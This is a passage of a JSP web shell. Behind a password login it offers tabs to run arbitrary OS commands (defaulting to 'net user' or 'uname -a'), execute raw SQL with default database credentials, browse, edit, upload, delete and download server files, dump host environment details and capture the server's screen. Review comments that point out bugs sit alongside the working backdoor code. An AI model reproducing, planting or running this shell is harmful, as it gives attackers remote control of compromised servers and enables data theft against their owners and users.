                bRet = orChinese("connect success");
            } catch (SQLException e) {
                bRet = orChinese("connect failed") + ": " + e.getMessage();
            }
        }
        return bRet;
    }
 679 
    /**
     * Runs one raw SQL string on the page-level JDBC connection and renders
     * the outcome as an HTML fragment for the shell's "Database" tab.
     *
     * Statements whose first six characters (case-insensitive) are "select"
     * go through executeQuery() and are rendered as a table; everything else
     * goes through Statement.execute(). The text is executed exactly as
     * received (the caller hands over the request parameter unchanged), so
     * there is deliberately no parameterisation here - this is the shell's
     * interactive SQL console.
     *
     * @param sql statement text; may be null
     * @return HTML: a result table, a success line, or a red error line
     */
    public String DBExecute(String sql) {
        String sRet = "";
        if (sql == null)
            return "SQL is null";
        // conn / dbStatement are page-level fields populated by the connect
        // path elsewhere in the page; nothing is opened or closed here.
        if (conn == null || dbStatement == null) {
            sRet = "<font color=\\"red\\">" + orChinese("Can not connect to database") + "</font>";
        } else {
            try {
                // Guard so the substring(0, 6) below cannot throw.
                if (sql.length() <= 6)
                    return "<font color=\\"red\\">" + orChinese("Invalid SQL") + "</font>";
                if (sql.toLowerCase().substring(0, 6).equals("select")) {
                    // NOTE(review): rs is only closed on the normal path at the
                    // end of this branch; an SQLException thrown mid-iteration
                    // leaves the ResultSet open.
                    ResultSet rs = dbStatement.executeQuery(sql);
                    ResultSetMetaData rsmd = rs.getMetaData();
                    int colNum = rsmd.getColumnCount();
                    int colType;

                    // Header row: "<name>(<db type name>)" per column. Column
                    // names and every cell value below are concatenated into
                    // the HTML without escaping.
                    sRet = orChinese("SQL execute success") + ", " + orChinese("result") + ":<br>\\n";
                    sRet += "<table align=\\"center\\" border=\\"0\\" cellpadding=\\"2\\" cellspacing=\\"1\\">\\n";
                    sRet += "    <tr>\\n";
                    for (int i = 1; i <= colNum; i++) {
                        sRet += "        <th>" + rsmd.getColumnName(i) + "(" + rsmd.getColumnTypeName(i) + ")</th>\\n";
                    }
                    sRet += "    </tr>\\n";
                    while (rs.next()) {
                        sRet += "    <tr>\\n";
                        for (int i = 1; i <= colNum; i++) {
                            colType = rsmd.getColumnType(i);

                            sRet += "        <td>";
                            // Render by java.sql.Types code. Types not listed
                            // here (e.g. SMALLINT, TIMESTAMP, LONGVARCHAR,
                            // CLOB, NVARCHAR) fall out of the switch and
                            // produce an empty cell.
                            switch (colType) {
                            case Types.BIGINT:
                                sRet += rs.getLong(i);
                                break;

                            case Types.BIT:
                                sRet += rs.getBoolean(i);
                                break;

                            case Types.BOOLEAN:
                                sRet += rs.getBoolean(i);
                                break;

                            case Types.CHAR:
                                sRet += rs.getString(i);
                                break;

                            // NOTE(review): getDate()/getTime()/getTimestamp()
                            // return null for SQL NULL, so .toString() throws
                            // NullPointerException, which the SQLException
                            // catch below does not cover - it propagates out
                            // of the JSP.
                            case Types.DATE:
                                sRet += rs.getDate(i).toString();
                                break;

                            case Types.DECIMAL:
                                sRet += rs.getDouble(i);
                                break;

                            case Types.NUMERIC:
                                sRet += rs.getDouble(i);
                                break;

                            case Types.REAL:
                                sRet += rs.getDouble(i);
                                break;

                            case Types.DOUBLE:
                                sRet += rs.getDouble(i);
                                break;

                            case Types.FLOAT:
                                sRet += rs.getFloat(i);
                                break;

                            case Types.INTEGER:
                                sRet += rs.getInt(i);
                                break;

                            case Types.TINYINT:
                                sRet += rs.getShort(i);
                                break;

                            case Types.VARCHAR:
                                sRet += rs.getString(i);
                                break;

                            case Types.TIME:
                                sRet += rs.getTime(i).toString();
                                break;

                            // NOTE(review): a timestamp is read under
                            // Types.DATALINK; this looks like it was meant to
                            // be Types.TIMESTAMP - confirm. As written,
                            // TIMESTAMP columns render as empty cells.
                            case Types.DATALINK:
                                sRet += rs.getTimestamp(i).toString();
                                break;
                            }
                            sRet += "        </td>\\n";
                        }
                        sRet += "    </tr>\\n";
                    }
                    sRet += "</table>\\n";

                    rs.close();
                } else {
                    // NOTE(review): Statement.execute() returns true only when
                    // the first result is a ResultSet. A successful
                    // INSERT/UPDATE/DELETE/DDL returns false and is therefore
                    // reported here as "SQL execute failed" even though it ran.
                    if (dbStatement.execute(sql)) {
                        sRet = orChinese("SQL execute success");
                    } else {
                        sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>";
                    }
                }
            } catch (SQLException e) {
                // The driver's error detail is discarded; only the generic
                // message reaches the page.
                sRet = "<font color=\\"red\\">" + orChinese("SQL execute failed") + "</font>";
            }
        }

        return sRet;
    }
 791 
    /**
     * "Screen Capture" action: grabs the server's primary display with
     * java.awt.Robot and writes it to the response as a JPEG.
     *
     * The response is reset first, discarding whatever the JSP has already
     * buffered; the no-cache headers are set after the reset so they survive
     * it. Every failure is swallowed by the catch-all below - in particular
     * AWTException / HeadlessException on a server with no display - which
     * leaves an empty (or partially written) response and means the declared
     * "throws Exception" is never actually raised.
     *
     * @param request  not used
     * @param response receives the image bytes and headers
     */
    private void getScreenImg(HttpServletRequest request, HttpServletResponse response) throws Exception {
        try{
            response.reset();
            // "image/jpg" is not the registered type ("image/jpeg"); browsers
            // appear to tolerate it, but the header is non-standard.
            response.setContentType("image/jpg");
            ServletOutputStream sos = response.getOutputStream();
            response.setHeader("Pragma", "No-cache");
            response.setHeader("Cache-Control", "no-cache");
            response.setDateHeader("Expires", 0);
            // Full-size rectangle of the default screen, origin (0,0).
            Dimension dimension = Toolkit.getDefaultToolkit().getScreenSize();
            BufferedImage screenshot = (new Robot())
                    .createScreenCapture(new Rectangle(0, 0, (int) dimension.getWidth(), (int) dimension.getHeight()));
            // Encode to memory first so Content-Length can be set exactly.
            ByteArrayOutputStream bos = new ByteArrayOutputStream();
            ImageIO.write(screenshot, "jpg", bos);
            byte[] buf = bos.toByteArray();
            response.setContentLength(buf.length);
            sos.write(buf);
            bos.close();
            // Closing the servlet stream commits the response; anything the
            // calling JSP writes afterwards is presumably dropped - confirm
            // against the "screen" action handler.
            sos.close();
        }catch(Exception e){
            // NOTE(review): silent catch; not even e.getMessage() is surfaced.
        }
    }
 813 
    /**
     * "Driver Info" row of the Environment tab: every filesystem root the JVM
     * reports, each with its free and total space.
     *
     * @return HTML fragment, one "&lt;path&gt;&amp;nbsp;(&lt;free&gt; Free, Total &lt;total&gt;)&lt;br&gt;"
     *         entry per root, in File.listRoots() order; empty string if none
     */
    public String getDriverInfo() {
        StringBuilder html = new StringBuilder();
        for (File root : File.listRoots()) {
            html.append(root.getPath()).append("&nbsp;(")
                .append(getSize(root.getFreeSpace())).append(' ')
                .append(orChinese("Free, Total")).append(' ')
                .append(getSize(root.getTotalSpace())).append(")<br>");
        }
        return html.toString();
    }%>
 824 
 825 <html>
 826 <head>
 827 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
 828 <style>
 829 body {font-size: 14px;font-family: &#23435; &#20307; ;color: white;background-color: black;text-align: center;padding: 5 5 5 5;}
 830 .trans {background: transparent;margin: 1 1 1 1;color: white;}
 831 input.textbox {border: black solid 1;font-size: 12px;height: 18px;}
 832 textarea {border: black solid 1;}
 833 table {border-collapse: collapse;}
 834 table.onhover tr:hover{background:red;}
 835 td {border: 1px dotted #FFF;height: 18px;}
 836 .break-all {word-break: break-all;}
 837 .oper {display: inline-block;float: left;width: 130px;border: 1px dotted #FFF;padding: 5px;margin-right: 3px;margin-bottom: 15px;height: 18px;cursor: hand;}
 838 .container {position: absolute;margin: 2 2 2 2;top: 68px;width: 95%;}
 839 a:link, a:visited {text-decoration: none;color: #FFF;}
 840 a:hover {text-decoration: underline;color: #FFF;}
 841 
 842 </style>
 843 <script type="text/JavaScript">
    // Login page: submit the password form on Enter. Relies on the legacy
    // global `event` (window.event) and on named-form access (`loginForm`)
    // rather than on an event argument; wired via the input's onkeydown.
    var pressKey = function() {
        if (event.keyCode == 13) {
            event.returnValue = false;
            event.cancel = true;
            loginForm.submit();
        }
    }
    // Tab navigation: store the chosen action ("env", "file", "command", ...)
    // in the hidden #actionOption field and submit #actionForm as a GET.
    // NOTE(review): `actionOption` on the right-hand side is the hoisted local
    // being declared, so getElementById() receives undefined, returns null,
    // and the assignment on the next line throws. The intended argument is
    // presumably the string "actionOption" - unless quotes were lost when the
    // listing was posted; confirm against the original file.
    var redirect = function(action) {
        var actionOption = document.getElementById(actionOption);
        actionOption.value = action;
        actionForm.submit();
    }
    // "Create File"/"Create Folder": append the typed name to the given URL and
    // navigate. The name is not URL-encoded, so "&", "#" or "+" in it would
    // alter the query string.
    // NOTE(review): `createFileName` is not declared here, so it resolves to
    // the window property the browser exposes for the element with that id;
    // passing that element to getElementById() stringifies it and yields
    // null, making `filename.value` throw. Presumably meant "createFileName".
    var createFile = function(url){
        var filename = document.getElementById(createFileName);
        window.location.href = url + "&fileName=" + filename.value;
    }
    // "Rename": prompt for the new name and navigate to url&newName=...;
    // an empty or cancelled prompt shows errormsg instead. As above, the
    // value is not URL-encoded.
    var rename = function(url, msg, errormsg){
        var result = prompt(msg + "" ,"")
        if (result){
            window.location.href=url + "&newName=" + result;
        }else{
            alert(errormsg);
        }
    }
    // Database tab: append the sub-action to #sqlform's action and submit.
    // Each call appends another "&fsAction=" to the same form, so the
    // parameter accumulates if the function runs more than once on a page.
    var dbsubmit = function(fsAction){
        var form = document.getElementById("sqlform");
        form.action  += "&fsAction=" + fsAction;
        document.getElementById("sqlform").submit();
    }
    // Language switch: pass the current URL along as `oldurl` with "&" and "?"
    // replaced by placeholders the server maps back. String.replace with a
    // string pattern only replaces the FIRST occurrence, so an oldurl holding
    // several "&" is only partially encoded.
    var languageChanged = function(url , oldurl){
        oldurl = oldurl.replace("&","{{and}}").replace("?","{{question}}");
        url = url + "&oldurl=" + oldurl;
        window.location.href = url;
    }
 878 </script>
 879 <title><%=shellName %></title>
 880 </head>
 881 <body>
 882     <%
 883         session.setMaxInactiveInterval(sessionOutTime * 60);
 884         if (request.getParameter("myPassword") == null && session.getAttribute("myPassword") == null) {
 885             if (request.getParameter("lang") !=null){
 886                 language = request.getParameter("lang");
 887                 String oldurl = request.getParameter("oldurl");
 888                 String str = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />";
 889                 out.println(str);
 890                 out.flush();
 891             }
 892     %>
 893     <font style="font-size: 300px; color: white"><% out.println(loginIcon); %></font>
 894     <form name="loginForm">
 895         <font size=4><%=welcomeMsg() %></font><br><br>
 896         <input class="textbox" size="30" name="myPassword" type="password" onkeydown="pressKey()" />
 897     </form>
 898     <%
 899         } else {
 900             String password = null;
 901             if (session.getAttribute("myPassword") == null) {
 902                 password = (String) request.getParameter("myPassword");
 903                 if (!myPassword.equals(password)) {
 904                     String rtnStr = "<div align=\\"center\\"><br><br><font color=\\"red\\">"+orChinese("Wrong Password")+"</font></div>";
 905                     rtnStr += "<meta http-equiv=\\"refresh\\" content=\\"1;url=" + request.getRequestURL() + "\\" />";
 906                     out.println(rtnStr);
 907                     out.flush();
 908                     //out.close();
 909                     return;
 910                 }
 911                 session.setAttribute("myPassword", password);
 912             } else {
 913                 password = (String) session.getAttribute("myPassword");
 914             }
 915 
 916             String action = null;
 917             if (request.getParameter("action") == null)
 918                 action = "env";
 919             else
 920                 action = (String) request.getParameter("action");
 921 
 922             if (action.equals("exit")) {
 923                 session.removeAttribute("myPassword");
 924                 response.sendRedirect(request.getRequestURI());
 925                 //out.close();
 926                 return;
 927             }
 928     %>
 929     <form name="actionForm">
 930         <input id="actionOption" type="hidden" name="action" value="Environment" />
 931     </form>
 932     <div style="margin-left: 2px">
 933         <div class="oper" onclick="redirect(‘env‘)"><%=orChinese("Environment")%></div>
 934         <div class="oper" onclick="redirect(‘file‘)" id="file_system"><%=orChinese("File Manager")%></div>
 935         <div class="oper" onclick="redirect(‘search‘)"><%=orChinese("File Search")%></div>
 936         <div class="oper" onclick="redirect(‘command‘)"><%=orChinese("Command")%></div>
 937         <div class="oper" onclick="redirect(‘database‘)"><%=orChinese("Database")%></div>
 938         <div class="oper" onclick="redirect(‘screen‘)"><%=orChinese("Screen Capture")%></div>
 939         <div class="oper" onclick="redirect(‘exit‘)"><%=orChinese("Logoff")%></div>
 940     </div>
 941     <%  if (action.equals("lang")){
 942         language =     request.getParameter("lang");
 943         String oldurl = request.getParameter("oldurl");
 944         if (oldurl!= null){
 945             oldurl = oldurl.replace("{{and}}", "&").replace("{{question}}", "?");
 946         }
 947         String sRet = "<meta http-equiv=\\"refresh\\" content=\\"0;url="+oldurl+"\\" />";
 948         %>
 949     <div class="container break-all"><%=sRet %></div>
 950     <%
 951     }else if (action.equals("env")) {
 952     %>
 953     <table class="container break-all onhover">
 954         <tr>
 955             <td width="20%"><%=orChinese("OS") %></td>
 956             <td width="80%"><%=System.getProperty("os.name") + " " + System.getProperty("os.version") + " "+ System.getProperty("os.arch")%></td>
 957         </tr>
 958         <tr>
 959             <td><%=orChinese("Computer Name") %></td>
 960             <td><%=System.getenv().get("COMPUTERNAME")%></td>
 961         </tr>
 962         <tr>
 963             <td><%=orChinese("Available Processors") %></td>
 964             <td><%=Runtime.getRuntime().availableProcessors() %></td>
 965         </tr>
 966         <tr>
 967             <td><%=orChinese("IP") %></td>
 968             <td><%=InetAddress.getLocalHost().getHostAddress().toString() %></td>
 969         </tr>
 970         <tr>
 971             <td><%=orChinese("System Driver") %></td>
 972             <td><%=System.getenv().get("SystemDrive")%></td>
 973         </tr>
 974         <tr>
 975             <td><%=orChinese("Driver Info") %></td>
 976             <td><%=getDriverInfo() %></td>
 977         </tr>
 978         <tr>
 979             <td><%=orChinese("User Name") %></td>
 980             <td><%=System.getenv().get("USERNAME")%></td>
 981         </tr>
 982         <tr>
 983             <td><%=orChinese("User Domain") %></td>
 984             <td><%=System.getenv().get("USERDOMAIN")%></td>
 985         </tr>
 986         <tr>
 987             <td><%=orChinese("User DNS Domain") %></td>
 988             <td><%=System.getenv().get("USERDNSDOMAIN")%></td>
 989         </tr>
 990         <tr>
 991             <td><%=orChinese("User Profile") %></td>
 992             <td><%=System.getenv().get("USERPROFILE")%></td>
 993         </tr>
 994         <tr>
 995             <td><%=orChinese("All User Profile") %></td>
 996             <td><%=System.getenv().get("ALLUSERSPROFILE")%></td>
 997         </tr>
 998         <tr>
 999             <td><%=orChinese("Temp") %></td>
1000             <td><%=System.getenv().get("TEMP")%></td>
1001         </tr>
1002         <tr>
1003             <td><%=orChinese("Program Files") %></td>
1004             <td><%=System.getenv().get("ProgramFiles")%></td>
1005         </tr>
1006         <tr>
1007             <td><%=orChinese("AppData") %></td>
1008             <td><%=System.getenv().get("APPDATA")%></td>
1009         </tr>
1010         <tr>
1011             <td><%=orChinese("System Root") %></td>
1012             <td><%=System.getenv().get("SystemRoot")%></td>
1013         </tr>
1014         <tr>
1015             <td><%=orChinese("Console") %></td>
1016             <td><%=System.getenv().get("ComSpec")%></td>
1017         </tr>
1018         <tr>
1019             <td><%=orChinese("File Executable") %></td>
1020             <td><%=System.getenv().get("PATHEXT")%></td>
1021         </tr>
1022         <tr>
1023             <td><%=orChinese("My Path") %></td>
1024             <td><%=request.getSession().getServletContext().getRealPath(request.getServletPath())%></td>
1025         </tr>
1026         <tr>
1027             <td><%=orChinese("User Dir") %></td>
1028             <td><%=System.getProperty("user.dir")%></td>
1029         </tr>
1030         <tr>
1031             <td><%=orChinese("Protocol") %></td>
1032             <td><%=request.getProtocol()%></td>
1033         </tr>
1034         <tr>
1035             <td><%=orChinese("Server Info") %></td>
1036             <td><%=application.getServerInfo()%></td>
1037         </tr>
1038         <tr>
1039             <td><%=orChinese("JDK Version") %></td>
1040             <td><%=System.getProperty("java.version")%></td>
1041         </tr>
1042         <tr>
1043             <td><%=orChinese("JDK Home") %></td>
1044             <td><%=System.getProperty("java.home")%></td>
1045         </tr>
1046         <tr>
1047             <td><%=orChinese("JVM Version") %></td>
1048             <td><%=System.getProperty("java.vm.specification.version")%></td>
1049         </tr>
1050         <tr>
1051             <td><%=orChinese("JVM Name") %></td>
1052             <td><%=System.getProperty("java.vm.name")%></td>
1053         </tr>
1054         <tr>
1055             <td><%=orChinese("Class Path") %></td>
1056             <td><%=System.getProperty("java.class.path")%></td>
1057         </tr>
1058         <tr>
1059             <td><%=orChinese("Java Library Path") %></td>
1060             <td><%=System.getProperty("java.library.path")%></td>
1061         </tr>
1062         <tr>
1063             <td><%=orChinese("Java tmpdir") %></td>
1064             <td><%=System.getProperty("java.io.tmpdir")%></td>
1065         </tr>
1066         <tr>
1067             <td><%=orChinese("Compiler") %></td>
1068             <td><%=System.getProperty("java.compiler") == null ? "" : System.getProperty("java.compiler")%></td>
1069         </tr>
1070         <tr>
1071             <td><%=orChinese("Java ext dirs") %></td>
1072             <td><%=System.getProperty("java.ext.dirs")%></td>
1073         </tr>
1074         <tr>
1075             <td><%=orChinese("Remote Addr") %></td>
1076             <td><%=request.getRemoteAddr()%></td>
1077         </tr>
1078         <tr>
1079             <td><%=orChinese("Remote Host") %></td>
1080             <td><%=request.getRemoteHost()%></td>
1081         </tr>
1082         <tr>
1083             <td><%=orChinese("Remote User") %></td>
1084             <td><%=request.getRemoteUser() == null ? "" : request.getRemoteUser()%></td>
1085         </tr>
1086         <tr>
1087             <td><%=orChinese("Scheme") %></td>
1088             <td><%=request.getScheme()%></td>
1089         </tr>
1090         <tr>
1091             <td><%=orChinese("Secure") %></td>
1092             <td><%=request.isSecure() == true ? orChinese("Yes") : orChinese("No") %></td>
1093         </tr>
1094     </table>
1095     <%
1096         }
1097         if (action.equals("file")) {
1098             String curPath = "";
1099             String result = "";
1100             String fsAction = "";
1101             if (request.getParameter("curPath") == null) {
1102                 curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1103                 curPath = pathConvert((new File(curPath)).getParent());
1104             }
1105             else {
1106                 curPath = Unicode2GB((String)request.getParameter("curPath"));
1107                 curPath = pathConvert(curPath);
1108             }
1109             if (request.getParameter("fsAction") == null) {
1110                 fsAction = "list";
1111             } else {
1112                 fsAction = (String)request.getParameter("fsAction");
1113             }
1114             if (fsAction.equals("list")){
1115             %>
1116     <div class="container">
1117         <form method="post" name="form3" action="<%= request.getRequestURI() + "?action=file"%>">
1118             <div align="left">
1119 
1120                 <input type="text" class="trans" size="100" name="curPath" value="<%=curPath%>" /> <input type="submit" value="<%=orChinese("GOTO") %>"
1121                     class="trans" /> <input type="button" value="<%=orChinese("Home") %>" class="trans"
1122                     onclick="javascript:document.getElementById(‘file_system‘).click();" />
1123                 <% 
1124                 String os = System.getProperties().getProperty("os.name");
1125                 if (os.toUpperCase().contains("WIN")){
1126                     File[] files = File.listRoots();
1127                     for(int i = 0; i < files.length; i++) {
1128                            %>
1129                 <input type="button" class="trans"
1130                     onclick="javascript:window.location.href=‘<%= request.getRequestURI() + "?action=file&curPath=" + files[i].getPath().replace("\\\\", "/")%>‘"
1131                     value="<%= files[i]%>" />
1132                 <%
1133                     }
1134                 }
1135                 %>
1136 
1137             </div>
1138             <table class="onhover" style="width: 100%">
1139                 <tr>
1140                     <td align="center"><%=orChinese("File Name") %></td>
1141                     <td align="center" width="10%"><%=orChinese("Size") %></td>
1142                     <td align="center" width="38%"><%=orChinese("Operation") %></td>
1143                 </tr>
1144                 <tr>
1145                     <%
1146                     File curFolder = new File(curPath);
1147                 %>
1148                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=curFolder.getParent() %>">[..]</a></td>
1149                     <td align="right"></td>
1150                     <td></td>
1151                 </tr>
1152                 <% 
1153                 for (File file : this.getFolderList(curPath)){
1154                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1155                     f.setHtmlOperation(Operation.Rename,Operation.Delete,Operation.Download);
1156                     %>
1157                 <tr>
1158                     <td><a href="<%=request.getRequestURI() %>?action=file&curPath=<%=f.getAbsolutePath() %>">[<%=f.getName() %>]
1159                     </a></td>
1160                     <td align="right"><%=f.getLength() %></td>
1161                     <td><%=f.getHtmlOperation() %></td>
1162                 </tr>
1163                 <%
1164                 }
1165                 for (File file : this.getFileList(curPath)){
1166                     MyFile f = new MyFile(file.getAbsolutePath(),request.getRequestURI()+"?action=file&curPath=" +curPath );
1167                     f.setHtmlOperation(Operation.Edit,Operation.Rename,Operation.Delete,Operation.Download);
1168                     %>
1169                 <tr>
1170                     <td><%=f.getName() %></td>
1171                     <td align="right"><%=f.getLength() %></td>
1172                     <td><%=f.getHtmlOperation() %></td>
1173                 </tr>
1174                 <%
1175                 }
1176                 %>
1177             </table>
1178             <div align="left">
1179                 <table style="width: 100%;">
1180                     <tr>
1181                         <td align="left" style="border: 0">
1182                             <input type="text" name="uploadFilePath" id="uploadFilePath" size="60" class="trans" /> 
1183                             <input type="button" value="<%=orChinese("Select")%>" class="trans" onclick="javascript:document.getElementById(‘fileSelect‘).click()"> 
1184                             <input type="button" value="<%=orChinese("Upload")%>" class="trans" onclick="javascript:document.getElementById(‘uploadform‘).submit()" />
1185                         </td>
1186                         <td align="right" style="border: 0">
1187                             <input type="text" id="createFileName" class="trans" size="26" name="fileName" /> 
1188                             <input type="button" class="trans" value="<%=orChinese("Create File")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFile"%>")‘>
1189                             <input type="button" class="trans" value="<%=orChinese("Create Folder")%>" onclick=‘createFile("<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=createFolder"%>")‘>
1190                         </td>
1191                     </tr>
1192                 </table>
1193             </div>
1194         </form>
1195         <div align="left">
1196             <form id="uploadform" name="upload" enctype="multipart/form-data" method="post"
1197                 action="<%=request.getRequestURI() + "?action=file&curPath=" + curPath + "&fsAction=upload"%>">
1198                 <input type="file" style="display: none" name="upFile" id="fileSelect"
1199                     onchange="javascript:document.getElementById(‘uploadFilePath‘).value=this.value" />
1200             </form>
1201         </div>
1202     </div>
1203 
1204     <%
1205             }else if (fsAction.equals("Edit")){
1206                 if (request.getParameter("fileName") == null) {
1207                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1208                 } else {
1209                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1210                     result = openFile(curPath, fileName, request.getRequestURI() + "?action=" + action);
1211                 }
1212             }else if (fsAction.equals("save")) {
1213                  if (request.getParameter("fileContent") == null) {
1214                     result = "<font color=\\"red\\">"+orChinese("Content is null")+"</font>";
1215                 } else {
1216                     if (request.getParameter("fileName") == null) {
1217                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1218                     } else {
1219                         String fileName = Unicode2GB(request.getParameter("fileName").trim());
1220                         String fileContent = Unicode2GB((String)request.getParameter("fileContent"));
1221                         result = saveFile(curPath, fileName, request.getRequestURI() + "?action=" + action, fileContent);
1222                     }
1223                 }
1224             } else if (fsAction.equals("createFolder")) {
1225                 if (request.getParameter("fileName") == null) {
1226                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1227                 } else {
1228                     String folderName = Unicode2GB(request.getParameter("fileName").trim());
1229                     if (folderName.equals("")) {
1230                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("Folder name is null")+"</font></div>";
1231                     } else {
1232                         result = createFolder(curPath,folderName,request.getRequestURI() + "?action=" + action);
1233                     }
1234                 } 
1235             } else if (fsAction.equals("createFile")) {
1236                  if (request.getParameter("fileName") == null) {
1237                     result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>";
1238                 } else {
1239                     String fileName = Unicode2GB(request.getParameter("fileName").trim());
1240                     if (fileName.equals("")) {
1241                         result = "<div class=\\"container\\"><font color=\\"red\\">"+orChinese("File name is null")+"</font></div>";
1242                     } else {
1243                         result = createFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1244                     }
1245                 }
1246             } else if (fsAction.equals("Delete")) {
1247                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1248                 result = deleteFile(curPath,fileName,request.getRequestURI() + "?action=" + action);
1249             } else if (fsAction.equals("upload")) {
1250                 result = uploadFile(request, curPath, request.getRequestURI() + "?action=" + action);
1251             } else if (fsAction.equals("Rename")) {
1252                 String newName = Unicode2GB(request.getParameter("newName").trim());
1253                 String fileName = Unicode2GB(request.getParameter("fileName").trim());
1254                 result = rename(curPath,fileName,newName,request.getRequestURI() + "?action=" + action);
1255             } else if (fsAction.equals("Download")) {
1256                 String fileName= Unicode2GB(request.getParameter("fileName").trim());
1257                 result = download(curPath,fileName,request.getRequestURI() + "?action=" + action, response);
1258             }
1259             %>
1260     <div class="container">
1261         <font color="red"><%=result %></font>
1262     </div>
1263     <%
1264         }
1265         if (action.equals("search")) {
1266             String curPath = request.getSession().getServletContext().getRealPath(request.getServletPath());
1267             curPath = pathConvert((new File(curPath)).getParent());
1268             
1269             String searchpath = Unicode2GB(request.getParameter("searchpath"));
1270             if (searchpath == null || searchpath.trim().length() == 0){
1271                 searchpath = curPath;
1272             }
1273             String searchsubfix = Unicode2GB(request.getParameter("searchsubfix"));
1274             if (searchsubfix == null || searchsubfix.trim().length() == 0){
1275                 searchsubfix = ".jsp .html .htm";
1276             }
1277             String searchby = request.getParameter("searchby");
1278             String ignorecase = request.getParameter("ignorecase");
1279             String searchcontent = Unicode2GB(request.getParameter("searchcontent"));
1280             if (searchcontent == null || searchcontent.trim().length() == 0){
1281                 searchcontent = "index";
1282             }
1283             String fsAction = request.getParameter("fsAction");
1284             String searchResult = "";
1285             if (fsAction != null){
1286                 searchResult = searchFile(searchpath, searchcontent , searchsubfix, "name".equals(searchby),"yes".equals(ignorecase));
1287             }
1288     %>
1289     <form class="container" name="searchForm" method="post" action="<%=request.getRequestURI() + "?action=search&fsAction=search"%>">
1290         <table>
1291             <tr>
1292                 <td width="260px" align="right"><%=orChinese("Search from") %>:</td>
1293                 <td><input type="text" id="searchpath" class="trans" name="searchpath" size="100" value="<%=searchpath %>" /></td>
1294             </tr>
1295             <tr>
1296                 <td align="right"><%=orChinese("Search for file type") %>:</td>
1297                 <td><input type="text" id="searchsubfix" class="trans" name="searchsubfix" size="100" value="<%=searchsubfix %>" /></td>
1298             </tr>
1299             <tr>
1300                 <td align="right"><%=orChinese("Setting") %>:</td>
1301                 <td>
1302                     <%
1303                     if ("content".equals(searchby)){
1304                         %> <input type="radio" class="trans" name="searchby" value="name" /><%=orChinese("Search by Name") %> <input type="radio" name="searchby"
1305                     class="trans" value="content" checked="checked" /><%=orChinese("Search by Content") %> <%
1306                     }else{
1307                         %> <input type="radio" class="trans" name="searchby" value="name" checked="checked" /><%=orChinese("Search by Name") %> <input type="radio"
1308                     name="searchby" class="trans" value="content" /><%=orChinese("Search by Content") %> <%
1309                     }
1310                     if ("yes".equals(ignorecase)){
1311                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" checked="checked" /><%=orChinese("Ignore Case") %> <%
1312                     }else{
1313                         %> <input type="checkbox" name="ignorecase" class="trans" value="yes" /><%=orChinese("Ignore Case") %> <%
1314                     }
1315                     %>
1316                 </td>
1317             </tr>
1318             <tr>
1319                 <td align="right"><%=orChinese("Search keyword") %>:</td>
1320                 <td><input type="text" id="searchcontent" class="trans" name="searchcontent" size="40" value="<%=searchcontent %>" /> <input type="submit"
1321                     value="<%=orChinese("Search") %>" class="trans" /></td>
1322             </tr>
1323             <tr>
1324                 <td colspan="2" align="left" id="searchresult"><%=searchResult %></td>
1325             </tr>
1326         </table>
1327     </form>
1328     <%
1329         }
1330         if (action.equals("command")) {
1331             String cmd = "";
1332             InputStream ins = null;
1333             String result = "";
1334             
1335             if (request.getParameter("command") != null) {        
1336                 cmd = (String)request.getParameter("command");
1337                 result = exeCmd(cmd);
1338             }
1339     %>
1340     <form class="container" name="form2" method="post" action="<%=request.getRequestURI() + "?action=command"%>">
1341         <%
1342         if (cmd==null || "".equals(cmd.trim())){
1343             if (System.getProperty("os.name").toLowerCase().contains("windows")){
1344                 cmd = "cmd.exe /c net user";
1345             }else{
1346                 cmd = "uname -a";
1347             }
1348         }
1349     %>
1350         <div align="left">
1351             <input type="text" size="130" class="trans" size="133" name="command" value="<%=cmd%>" /> <input type="submit" class="trans"
1352                 value="<%=orChinese("Execute") %>" />
1353         </div>
1354         <table style="width: 100%; height: 100px">
1355             <tr>
1356                 <td><%=result == "" ? "&nbsp;" : result%></td>
1357             </tr>
1358         </table>
1359     </form>
1360     <% 
1361         } 
1362         if (action.equals("database")) { 
1363             String SQLResult = "";
1364             String dbType = request.getParameter("dbType");
1365             dbType = dbType == null?"mysql":dbType;
1366             String driver = request.getParameter("driver");
1367             String port = request.getParameter("port");
1368             String dbname = Unicode2GB(request.getParameter("dbname"));
1369             String host = Unicode2GB(request.getParameter("host"));
1370             String sql = Unicode2GB(request.getParameter("sql"));
1371             String dbuser = Unicode2GB(request.getParameter("dbuser"));
1372             String dbpass = Unicode2GB(request.getParameter("dbpass"));
1373             String fsAction = request.getParameter("fsAction");
1374             String connurl = Unicode2GB(request.getParameter("connurl"));
1375             if (sql==null) sql="";
1376             if (fsAction == null || "typeChange".equals(fsAction)){
1377                 if ("Mysql".equalsIgnoreCase(dbType)){
1378                     driver = "com.mysql.jdbc.Driver";
1379                     port = "3306";
1380                     dbuser = "root";
1381                     dbpass = "root";
1382                     host = "localhost";
1383                     dbname = "mysql";
1384                 }else if("Oracle".equalsIgnoreCase(dbType)){
1385                     driver = "oracle.jdbc.driver.OracleDriver";
1386                     port = "1521";
1387                     dbuser = "scott";
1388                     dbpass = "tiger";
1389                     host = "localhost";
1390                     dbname = "orcl";
1391                 }else if("SQLServer".equalsIgnoreCase(dbType)){
1392                     driver = "com.microsoft.jdbc.sqlserver.SQLServerDriver";
1393                     port = "1433";
1394                     dbuser = "sa";
1395                     dbpass = "123456";
1396                     host = "localhost";
1397                     dbname = "master";
